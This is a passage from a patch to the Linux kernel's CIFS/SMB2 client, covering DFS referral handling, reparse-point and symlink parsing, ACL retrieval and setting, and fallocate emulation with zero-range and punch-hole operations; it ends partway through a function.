++			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
++		goto out;
++	}
++
++	rc = parse_dfs_referrals(dfs_rsp, dfs_rsp_size,
++				 num_of_nodes, target_nodes,
++				 nls_codepage, remap, search_name,
++				 true /* is_unicode */);
++	if (rc) {
++		cifs_tcon_dbg(VFS, "parse error in %s rc=%d\n", __func__, rc);
++		goto out;
++	}
++
++ out:
++	if (tcon && !tcon->ipc) {
++		/* ipc tcons are not refcounted */
++		spin_lock(&cifs_tcp_ses_lock);
++		tcon->tc_count--;
++		/* tc_count can never go negative */
++		WARN_ON(tcon->tc_count < 0);
++		spin_unlock(&cifs_tcp_ses_lock);
++	}
++	kfree(utf16_path);
++	kfree(dfs_req);
++	kfree(dfs_rsp);
++	return rc;
++}
++
++static int
++parse_reparse_posix(struct reparse_posix_data *symlink_buf,
++		      u32 plen, char **target_path,
++		      struct cifs_sb_info *cifs_sb)
++{
++	unsigned int len;
++
++	/* See MS-FSCC 2.1.2.6 for the 'NFS' style reparse tags */
++	len = le16_to_cpu(symlink_buf->ReparseDataLength);
++
++	if (le64_to_cpu(symlink_buf->InodeType) != NFS_SPECFILE_LNK) {
++		cifs_dbg(VFS, "%lld not a supported symlink type\n",
++			le64_to_cpu(symlink_buf->InodeType));
++		return -EOPNOTSUPP;
++	}
++
++	*target_path = cifs_strndup_from_utf16(
++				symlink_buf->PathBuffer,
++				len, true, cifs_sb->local_nls);
++	if (!(*target_path))
++		return -ENOMEM;
++
++	convert_delimiter(*target_path, '/');
++	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++
++	return 0;
++}
++
++static int
++parse_reparse_symlink(struct reparse_symlink_data_buffer *symlink_buf,
++		      u32 plen, char **target_path,
++		      struct cifs_sb_info *cifs_sb)
++{
++	unsigned int sub_len;
++	unsigned int sub_offset;
++
++	/* We handle Symbolic Link reparse tag here. See: MS-FSCC 2.1.2.4 */
++
++	sub_offset = le16_to_cpu(symlink_buf->SubstituteNameOffset);
++	sub_len = le16_to_cpu(symlink_buf->SubstituteNameLength);
++	if (sub_offset + 20 > plen ||
++	    sub_offset + sub_len + 20 > plen) {
++		cifs_dbg(VFS, "srv returned malformed symlink buffer\n");
++		return -EIO;
++	}
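++	/*
++	 * The constant 20 above is the offset of PathBuffer within the
++	 * symbolic link reparse data buffer: the 8 byte reparse header
++	 * plus four 2 byte name offset/length fields plus 4 byte Flags
++	 * (see MS-FSCC 2.1.2.4).
++	 */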
++
++	*target_path = cifs_strndup_from_utf16(
++				symlink_buf->PathBuffer + sub_offset,
++				sub_len, true, cifs_sb->local_nls);
++	if (!(*target_path))
++		return -ENOMEM;
++
++	convert_delimiter(*target_path, '/');
++	cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++
++	return 0;
++}
++
++static int
++parse_reparse_point(struct reparse_data_buffer *buf,
++		    u32 plen, char **target_path,
++		    struct cifs_sb_info *cifs_sb)
++{
++	if (plen < sizeof(struct reparse_data_buffer)) {
++		cifs_dbg(VFS, "reparse buffer is too small. Must be at least 8 bytes but was %d\n",
++			 plen);
++		return -EIO;
++	}
++
++	if (plen < le16_to_cpu(buf->ReparseDataLength) +
++	    sizeof(struct reparse_data_buffer)) {
++		cifs_dbg(VFS, "srv returned invalid reparse buf length: %d\n",
++			 plen);
++		return -EIO;
++	}
++
++	/* See MS-FSCC 2.1.2 */
++	switch (le32_to_cpu(buf->ReparseTag)) {
++	case IO_REPARSE_TAG_NFS:
++		return parse_reparse_posix(
++			(struct reparse_posix_data *)buf,
++			plen, target_path, cifs_sb);
++	case IO_REPARSE_TAG_SYMLINK:
++		return parse_reparse_symlink(
++			(struct reparse_symlink_data_buffer *)buf,
++			plen, target_path, cifs_sb);
++	default:
++		cifs_dbg(VFS, "srv returned unknown symlink buffer tag:0x%08x\n",
++			 le32_to_cpu(buf->ReparseTag));
++		return -EOPNOTSUPP;
++	}
++}
++
++static int
++smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   char **target_path, bool is_reparse_point)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct kvec err_iov = {NULL, 0};
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_create_rsp *create_rsp;
++	struct smb2_ioctl_rsp *ioctl_rsp;
++	struct reparse_data_buffer *reparse_buf;
++	int create_options = is_reparse_point ? OPEN_REPARSE_POINT : 0;
++	u32 plen;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	*target_path = NULL;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto querty_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++
++	/* IOCTL */
++	memset(&io_iov, 0, sizeof(io_iov));
++	rqst[1].rq_iov = io_iov;
++	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst[1], fid.persistent_fid,
++			     fid.volatile_fid, FSCTL_GET_REPARSE_POINT, NULL, 0,
++			     CIFSMaxBufSize -
++			     MAX_SMB2_CREATE_RESPONSE_SIZE -
++			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++	if (rc)
++		goto querty_exit;
++
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto querty_exit;
++
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++
++	create_rsp = rsp_iov[0].iov_base;
++	if (create_rsp && create_rsp->hdr.Status)
++		err_iov = rsp_iov[0];
++	ioctl_rsp = rsp_iov[1].iov_base;
++
++	/*
++	 * Open was successful and we got an ioctl response.
++	 */
++	if ((rc == 0) && (is_reparse_point)) {
++		/* See MS-FSCC 2.3.23 */
++
++		reparse_buf = (struct reparse_data_buffer *)
++			((char *)ioctl_rsp +
++			 le32_to_cpu(ioctl_rsp->OutputOffset));
++		plen = le32_to_cpu(ioctl_rsp->OutputCount);
++
++		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
++		    rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(VFS, "srv returned invalid ioctl len: %d\n",
++				 plen);
++			rc = -EIO;
++			goto querty_exit;
++		}
++
++		rc = parse_reparse_point(reparse_buf, plen, target_path,
++					 cifs_sb);
++		goto querty_exit;
++	}
++
++	if (!rc || !err_iov.iov_base) {
++		rc = -ENOENT;
++		goto querty_exit;
++	}
++
++	rc = smb2_parse_symlink_response(cifs_sb, &err_iov, target_path);
++
++ querty_exit:
++	cifs_dbg(FYI, "query symlink rc %d\n", rc);
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_ioctl_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++
++int
++smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   __u32 *tag)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_ioctl_rsp *ioctl_rsp;
++	struct reparse_data_buffer *reparse_buf;
++	u32 plen;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	/*
++	 * setup smb2open - TODO add optimization to call cifs_get_readable_path
++	 * to see if there is a handle already open that we can use
++	 */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto query_rp_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++
++	/* IOCTL */
++	memset(&io_iov, 0, sizeof(io_iov));
++	rqst[1].rq_iov = io_iov;
++	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst[1], COMPOUND_FID,
++			     COMPOUND_FID, FSCTL_GET_REPARSE_POINT, NULL, 0,
++			     CIFSMaxBufSize -
++			     MAX_SMB2_CREATE_RESPONSE_SIZE -
++			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++	if (rc)
++		goto query_rp_exit;
++
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto query_rp_exit;
++
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++
++	ioctl_rsp = rsp_iov[1].iov_base;
++
++	/*
++	 * Open was successful and we got an ioctl response.
++	 */
++	if (rc == 0) {
++		/* See MS-FSCC 2.3.23 */
++
++		reparse_buf = (struct reparse_data_buffer *)
++			((char *)ioctl_rsp +
++			 le32_to_cpu(ioctl_rsp->OutputOffset));
++		plen = le32_to_cpu(ioctl_rsp->OutputCount);
++
++		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
++		    rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
++				 plen);
++			rc = -EIO;
++			goto query_rp_exit;
++		}
++		*tag = le32_to_cpu(reparse_buf->ReparseTag);
++	}
++
++ query_rp_exit:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_ioctl_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++
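++/*
++ * Retrieve the security descriptor for an already-open handle via
++ * SMB2_query_acl(); returns the descriptor on success or an ERR_PTR.
++ */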
++static struct cifs_ntsd *
++get_smb2_acl_by_fid(struct cifs_sb_info *cifs_sb,
++		    const struct cifs_fid *cifsfid, u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	unsigned int xid;
++	int rc = -EOPNOTSUPP;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	xid = get_xid();
++	cifs_dbg(FYI, "trying to get acl\n");
++
++	rc = SMB2_query_acl(xid, tlink_tcon(tlink), cifsfid->persistent_fid,
++			    cifsfid->volatile_fid, (void **)&pntsd, pacllen,
++			    info);
++	free_xid(xid);
++
++	cifs_put_tlink(tlink);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
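++/*
++ * Retrieve the security descriptor by path: open with READ_CONTROL (plus
++ * SYSTEM_SECURITY when the SACL is requested), query the ACL on the
++ * resulting handle, then close it.
++ */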
++static struct cifs_ntsd *
++get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
++		     const char *path, u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	unsigned int xid;
++	int rc;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	__le16 *utf16_path;
++
++	cifs_dbg(FYI, "get smb3 acl for path %s\n", path);
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		free_xid(xid);
++		return ERR_PTR(rc);
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
++
++	if (info & SACL_SECINFO)
++		oparms.desired_access |= SYSTEM_SECURITY;
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
++		       NULL);
++	kfree(utf16_path);
++	if (!rc) {
++		rc = SMB2_query_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
++				    fid.volatile_fid, (void **)&pntsd, pacllen,
++				    info);
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
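++/*
++ * Write a security descriptor to the server. The access mask for the open
++ * is derived from which parts of the descriptor are being set: WRITE_OWNER
++ * for owner/group, SYSTEM_SECURITY for the SACL, WRITE_DAC for the DACL.
++ */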
++static int
++set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
++		struct inode *inode, const char *path, int aclflag)
++{
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	unsigned int xid;
++	int rc, access_flags = 0;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	__le16 *utf16_path;
++
++	cifs_dbg(FYI, "set smb3 acl for path %s\n", path);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	if (aclflag & CIFS_ACL_OWNER || aclflag & CIFS_ACL_GROUP)
++		access_flags |= WRITE_OWNER;
++	if (aclflag & CIFS_ACL_SACL)
++		access_flags |= SYSTEM_SECURITY;
++	if (aclflag & CIFS_ACL_DACL)
++		access_flags |= WRITE_DAC;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		free_xid(xid);
++		return rc;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	kfree(utf16_path);
++	if (!rc) {
++		rc = SMB2_set_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
++			    fid.volatile_fid, pnntsd, acllen, aclflag);
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return rc;
++}
++
++/* Retrieve an ACL from the server */
++static struct cifs_ntsd *
++get_smb2_acl(struct cifs_sb_info *cifs_sb,
++	     struct inode *inode, const char *path,
++	     u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	struct cifsFileInfo *open_file = NULL;
++
++	if (inode && !(info & SACL_SECINFO))
++		open_file = find_readable_file(CIFS_I(inode), true);
++	if (!open_file || (info & SACL_SECINFO))
++		return get_smb2_acl_by_path(cifs_sb, path, pacllen, info);
++
++	pntsd = get_smb2_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
++	cifsFileInfo_put(open_file);
++	return pntsd;
++}
++
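++/*
++ * Zero @len bytes at @offset on the server by sending FSCTL_SET_ZERO_DATA
++ * for the range [offset, offset + len) on the open handle.
++ */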
++static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
++			     loff_t offset, loff_t len, unsigned int xid)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++	struct file_zero_data_information fsctl_buf;
++
++	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
++
++	fsctl_buf.FileOffset = cpu_to_le64(offset);
++	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
++
++	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
++			  (char *)&fsctl_buf,
++			  sizeof(struct file_zero_data_information),
++			  0, NULL, NULL);
++}
++
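++/*
++ * FALLOC_FL_ZERO_RANGE emulation: drop the affected page cache pages, zero
++ * the range on the server and, unless @keep_size, extend EOF to cover the
++ * zeroed range.
++ */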
++static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
++			    loff_t offset, loff_t len, bool keep_size)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct inode *inode = file_inode(file);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifsFileInfo *cfile = file->private_data;
++	long rc;
++	unsigned int xid;
++	__le64 eof;
++
++	xid = get_xid();
++
++	trace_smb3_zero_enter(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len);
++
++	inode_lock(inode);
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/*
++	 * We zero the range through an ioctl, so we need to remove the page
++	 * caches first; otherwise the data may be inconsistent with the server.
++	 */
++	truncate_pagecache_range(inode, offset, offset + len - 1);
++
++	/* if file not oplocked can't be sure whether asking to extend size */
++	rc = -EOPNOTSUPP;
++	if (keep_size == false && !CIFS_CACHE_READ(cifsi))
++		goto zero_range_exit;
++
++	rc = smb3_zero_data(file, tcon, offset, len, xid);
++	if (rc < 0)
++		goto zero_range_exit;
++
++	/*
++	 * do we also need to change the size of the file?
++	 */
++	if (keep_size == false && i_size_read(inode) < offset + len) {
++		eof = cpu_to_le64(offset + len);
++		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++				  cfile->fid.volatile_fid, cfile->pid, &eof);
++	}
++
++ zero_range_exit:
++	filemap_invalidate_unlock(inode->i_mapping);
++	inode_unlock(inode);
++	free_xid(xid);
++	if (rc)
++		trace_smb3_zero_err(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len, rc);
++	else
++		trace_smb3_zero_done(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len);
++	return rc;
++}
++
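++/*
++ * FALLOC_FL_PUNCH_HOLE emulation: mark the file sparse if it is not
++ * already, then deallocate the range with FSCTL_SET_ZERO_DATA.
++ */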
++static long smb3_punch_hole(struct file *file, struct cifs_tcon *tcon,
++			    loff_t offset, loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++	struct file_zero_data_information fsctl_buf;
++	long rc;
++	unsigned int xid;
++	__u8 set_sparse = 1;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++	/* Need to make file sparse, if not already, before freeing range. */
++	/* Consider adding equivalent for compressed since it could also work */
++	if (!smb2_set_sparse(xid, tcon, cfile, inode, set_sparse)) {
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	filemap_invalidate_lock(inode->i_mapping);
++	/*
++	 * We implement the punch hole through an ioctl, so we need to remove
++	 * the page caches first; otherwise the data may be inconsistent with
++	 * the server.
++	 */
++	truncate_pagecache_range(inode, offset, offset + len - 1);
++
++	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
++
++	fsctl_buf.FileOffset = cpu_to_le64(offset);
++	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
++			(char *)&fsctl_buf,
++			sizeof(struct file_zero_data_information),
++			CIFSMaxBufSize, NULL, NULL);
++	filemap_invalidate_unlock(inode->i_mapping);
++out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
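++/*
++ * Materialize a range by writing the caller-supplied zero-filled buffer
++ * @buf to it with SMB2_write, in chunks of at most SMB2_MAX_BUFFER_SIZE.
++ */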
++static int smb3_simple_fallocate_write_range(unsigned int xid,
++					     struct cifs_tcon *tcon,
++					     struct cifsFileInfo *cfile,
++					     loff_t off, loff_t len,
++					     char *buf)
++{
++	struct cifs_io_parms io_parms = {0};
++	int nbytes;
++	int rc = 0;
++	struct kvec iov[2];
++
++	io_parms.netfid = cfile->fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.persistent_fid = cfile->fid.persistent_fid;
++	io_parms.volatile_fid = cfile->fid.volatile_fid;
++
++	while (len) {
++		io_parms.offset = off;
++		io_parms.length = len;
++		if (io_parms.length > SMB2_MAX_BUFFER_SIZE)
++			io_parms.length = SMB2_MAX_BUFFER_SIZE;
++		/* iov[0] is reserved for smb header */
++		iov[1].iov_base = buf;
++		iov[1].iov_len = io_parms.length;
++		rc = SMB2_write(xid, &io_parms, &nbytes, iov, 1);
++		if (rc)
++			break;
++		if (nbytes > len)
++			return -EINVAL;
++		buf += nbytes;
++		off += nbytes;
++		len -= nbytes;
++	}
++	return rc;
++}
++
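++/*
++ * Allocate a range of a sparse file: query the allocated ranges with
++ * FSCTL_QUERY_ALLOCATED_RANGES and write zeroes into the holes only,
++ * skipping regions that are already allocated.
++ */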
++static int smb3_simple_fallocate_range(unsigned int xid,
++				       struct cifs_tcon *tcon,
++				       struct cifsFileInfo *cfile,
++				       loff_t off, loff_t len)
++{
++	struct file_allocated_range_buffer in_data, *out_data = NULL, *tmp_data;
++	u32 out_data_len;
++	char *buf = NULL;
++	loff_t l;
++	int rc;
++
++	in_data.file_offset = cpu_to_le64(off);
++	in_data.length = cpu_to_le64(len);
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			1024 * sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc)
++		goto out;
++
++	buf = kzalloc(1024 * 1024, GFP_KERNEL);
++	if (buf == NULL) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	tmp_data = out_data;
++	while (len) {
++		/*
++		 * The rest of the region is unmapped so write it all.
++		 */
++		if (out_data_len == 0) {
++			rc = smb3_simple_fallocate_write_range(xid, tcon,
++					       cfile, off, len, buf);
++			goto out;
++		}
++
++		if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
++			rc = -EINVAL;
++			goto out;
++		}
++
++		if (off < le64_to_cpu(tmp_data->file_offset)) {
++			/*
++			 * We are at a hole. Write zeroes until the end of the
++			 * region or until the next allocated data, whichever
++			 * comes first.
++			 */
++			l = le64_to_cpu(tmp_data->file_offset) - off;
++			if (len < l)
++				l = len;
++			rc = smb3_simple_fallocate_write_range(xid, tcon,
++					       cfile, off, l, buf);
++			if (rc)
++				goto out;
++			off = off + l;
++			len = len - l;
++			if (len == 0)
++				goto out;
++		}
++		/*
++		 * We are at a section of allocated data, just skip forward
++		 * until the end of the data or the end of the region
++		 * we are supposed to fallocate, whichever comes first.
++		 */
++		l = le64_to_cpu(tmp_data->length);
++		if (len < l)
++			l = len;
++		off += l;
++		len -= l;
++
++		tmp_data = &tmp_data[1];
++		out_data_len -= sizeof(struct file_allocated_range_buffer);
++	}
++
++ out:
++	kfree(out_data);
++	kfree(buf);
++	return rc;
++}
++
++
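++/*
++ * Emulate fallocate() for mode 0 and FALLOC_FL_KEEP_SIZE. Extending
++ * allocations grow EOF; interior allocations on sparse files are emulated
++ * by zero-writing small (<= 1MB) regions, or by clearing the sparse
++ * attribute when nearly the whole file is covered.
++ */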
++static long smb3_simple_falloc(struct file *file, struct cifs_tcon *tcon,
++			    loff_t off, loff_t len, bool keep_size)
++{
++	struct inode *inode;
++	struct cifsInodeInfo *cifsi;
++	struct cifsFileInfo *cfile = file->private_data;
++	long rc = -EOPNOTSUPP;
++	unsigned int xid;
++	__le64 eof;
++
++	xid = get_xid();
++
++	inode = d_inode(cfile->dentry);
++	cifsi = CIFS_I(inode);
++
++	trace_smb3_falloc_enter(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len);
++	/* if file not oplocked can't be sure whether asking to extend size */
++	if (!CIFS_CACHE_READ(cifsi))
++		if (keep_size == false) {
++			trace_smb3_falloc_err(xid, cfile->fid.persistent_fid,
++				tcon->tid, tcon->ses->Suid, off, len, rc);
++			free_xid(xid);
++			return rc;
++		}
++
++	/*
++	 * Extending the file
++	 */
++	if ((keep_size == false) && i_size_read(inode) < off + len) {
++		rc = inode_newsize_ok(inode, off + len);
++		if (rc)
++			goto out;
++
++		if (cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)
++			smb2_set_sparse(xid, tcon, cfile, inode, false);
++
++		eof = cpu_to_le64(off + len);
++		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++				  cfile->fid.volatile_fid, cfile->pid, &eof);
++		if (rc == 0) {
++			cifsi->server_eof = off + len;
++			cifs_setsize(inode, off + len);
++			cifs_truncate_page(inode->i_mapping, inode->i_size);
++			truncate_setsize(inode, off + len);
++		}
++		goto out;
++	}
++
++	/*
++	 * Files are non-sparse by default, so falloc may be a no-op. Must
++	 * check whether the file is sparse: if it is not, and since we are
++	 * not extending, there is no need to do anything as the range is
++	 * already allocated.
++	 */
++	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) == 0) {
++		rc = 0;
++		goto out;
++	}
++
++	if (keep_size == true) {
++		/*
++		 * We cannot preallocate pages beyond the end of the file
++		 * in SMB2.
++		 */
++		if (off >= i_size_read(inode)) {
++			rc = 0;
++			goto out;
++		}
++		/*
++		 * For fallocates that are partially beyond the end of file,
++		 * clamp len so we only fallocate up to the end of file.
++		 */
++		if (off + len > i_size_read(inode)) {
++			len = i_size_read(inode) - off;
++		}
++	}
++
++	if ((keep_size == true) || (i_size_read(inode) >= off + len)) {
++		/*
++		 * At this point, we are trying to fallocate an internal
++		 * region of a sparse file. Since smb2 does not have a
++		 * fallocate command, we have two options for emulating this:
++		 * we can either make the entire file non-sparse, which we
++		 * only do if the fallocate covers virtually the whole file,
++		 * or we can overwrite the region with zeroes using SMB2_write,
++		 * which could be prohibitively expensive if len is large.
++		 */
++		/*
++		 * We are only trying to fallocate a small region so
++		 * just write it with zero.
++		 */
++		if (len <= 1024 * 1024) {
++			rc = smb3_simple_fallocate_range(xid, tcon, cfile,
++							 off, len);
